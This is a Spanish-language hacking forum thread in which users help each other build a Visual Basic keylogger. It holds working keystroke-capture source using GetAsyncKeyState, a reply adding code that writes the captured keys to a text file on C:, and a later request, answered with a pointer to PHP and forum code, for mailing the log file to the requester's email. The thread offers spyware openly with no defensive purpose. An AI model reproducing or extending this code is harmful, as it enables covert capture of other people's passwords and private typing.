elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Keylogger en VB ayuda
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Keylogger en VB ayuda  (Leído 3,081 veces)
Za3LoT


Desconectado Desconectado

Mensajes: 731


Ver Perfil
Keylogger en VB ayuda
« en: 26 Junio 2006, 12:20 pm »

Miren tenia este codigo que lo he cogido del tema de la recopilación de links....

Y me gustaria saber que modificaciones son necesarias para poder ejecutarlo y que me mande las pulsaciones de las teclas a un archivo .txt


Código:
'
'Módulo estándar basKeyLogger.bas
'
Option Explicit

Public bLogEnabled As Boolean

Function GetActiveKey() As Integer
         Static bStarted As Boolean
         Dim i%

  If Not bStarted Then
    'Inicializa el estado de las teclas llamando a
    'la función GetAsyncKeyState.
    '
    For i = 1 To 256
      Call GetAsyncKeyState(i)
    Next

    bStarted = True
  End If

  For i = 1 To 256
    'Obtiene la tecla pulsada actualmente.
    '
    If GetAsyncKeyState(i) Then
      GetActiveKey = i
     
      Exit For
    End If
  Next
End Function

Sub StopLog()
  bLogEnabled = False
End Sub

Sub LogKeys()
        Dim snTimer!
        Dim iActiveKey%
        Dim sChar$, sData$

  bLogEnabled = True
 
  Do While bLogEnabled
    snTimer = Timer
   
    Do While (Timer - snTimer) < 0.125
      'Espera 125 milisegundos hasta
      'la próxima pulsación.
    Loop
   
    iActiveKey = GetActiveKey
   
    Select Case iActiveKey
      Case vbKey0 To vbKey9, 32 To 47, vbKeyA To vbKeyZ
        sChar = Chr$(iActiveKey)
     
        sData = sData & sChar
     
      Case vbKeyReturn
        'Imprime lo que tiene en el buffer.
        '
        Debug.Print sData
       
        sData = vbNullString
      Case Else
        'Verifica otras teclas.
    End Select
  Loop

S4Lu2!!


En línea

<--v1c1ous-->


Desconectado Desconectado

Mensajes: 776


¡Operadora! ¡Deme el número para el 911! - Homero


Ver Perfil WWW
Re: Keylogger en VB ayuda
« Respuesta #1 en: 26 Junio 2006, 12:48 pm »

Hay un comentario muy lindo en tu codigo que dice "'Imprime lo que tiene en el buffer.", y una linea de codigo muy simpatica que dice "Debug.Print sData" que se activa al precionar Enter.

Ahi tenes la respuesta y podriamos ir dejando de lado el Scriptkiddies



En línea


Za3LoT


Desconectado Desconectado

Mensajes: 731


Ver Perfil
Re: Keylogger en VB ayuda
« Respuesta #2 en: 26 Junio 2006, 12:56 pm »

OK asias por la ayuda.

S4Lu2!!
En línea

Za3LoT


Desconectado Desconectado

Mensajes: 731


Ver Perfil
Re: Keylogger en VB ayuda
« Respuesta #3 en: 26 Junio 2006, 12:58 pm »

Si pone que "imprime lo que tiene en el buffer", pero donde lo imprime en algun archivo.txt?? por que de eso no pone nada creo yo.

S4Lu2!!
En línea

<--v1c1ous-->


Desconectado Desconectado

Mensajes: 776


¡Operadora! ¡Deme el número para el 911! - Homero


Ver Perfil WWW
Re: Keylogger en VB ayuda
« Respuesta #4 en: 26 Junio 2006, 13:03 pm »

Si pone.

Código:
Debug.Print sData

Si lo corres en tu VB advertiras que imprime lo capturado en la ventana de Debug.

Pone algo de entusiasmo, vamos... no respondere mas a este tema (Sin ofender).
En línea


Za3LoT


Desconectado Desconectado

Mensajes: 731


Ver Perfil
Re: Keylogger en VB ayuda
« Respuesta #5 en: 26 Junio 2006, 13:23 pm »

Vale, gracias por todo.

S4Lu2!!
En línea

X-TN

Desconectado Desconectado

Mensajes: 23


Ver Perfil WWW
Re: Keylogger en VB ayuda
« Respuesta #6 en: 26 Junio 2006, 21:27 pm »

Hay otra posibilidad, y es mandar las teclas capturadas a un textbox y luego mandar eso a un txt.

Código:
Public Function guardamos_teclas(contenido As String)
Dim canal%
contenido = Text1.Text
canal = FreeFile
Open "c:\texto.txt" For Append As canal
Print #canal, contenido
Close canal
End Function

Con esta función se guarda en un texto en c:

Salu2
En línea

Hideki

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Keylogger en VB ayuda
« Respuesta #7 en: 6 Julio 2006, 03:56 am »

Holas yo tengo un prog en vb parecido que genera un txt con todo lo escrito , mi pregunta es si hay forma de enviar ese archivo desde el mismo programa a un correo , he leido otros post de como enviar un mail desde vb con winsock pero no me resulta , existe otra forma , se puede conectar vb y php? , mi objetivo en si es hacer que ese archivo llegue a mi mail , agradeceria cualkier ayuda.
En línea

kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: Keylogger en VB ayuda
« Respuesta #8 en: 8 Julio 2008, 05:38 am »

hay muchas formas de enviar-lo

puedes usar php para envio solo del text y para att hay muchos codigos en el foro.

http://foro.elhacker.net/search.html

Ops. old topic
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con este Keylogger
Programación C/C++
tupapa007 2 1,857 Último mensaje 1 Marzo 2013, 23:48 pm
por tupapa007
Ayuda,keylogger.
Análisis y Diseño de Malware
-H4D3S- 5 3,596 Último mensaje 14 Mayo 2013, 19:50 pm
por daryo
Ayuda, keylogger
Seguridad
kopolo 2 2,454 Último mensaje 14 Junio 2014, 03:47 am
por Mister12
usb keylogger ayuda
Hacking
MrVndT 1 2,664 Último mensaje 27 Marzo 2015, 02:00 am
por Henyckma
Ayuda con Keylogger
Scripting
S4ur1k 1 2,247 Último mensaje 5 Abril 2020, 09:09 am
por fary
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines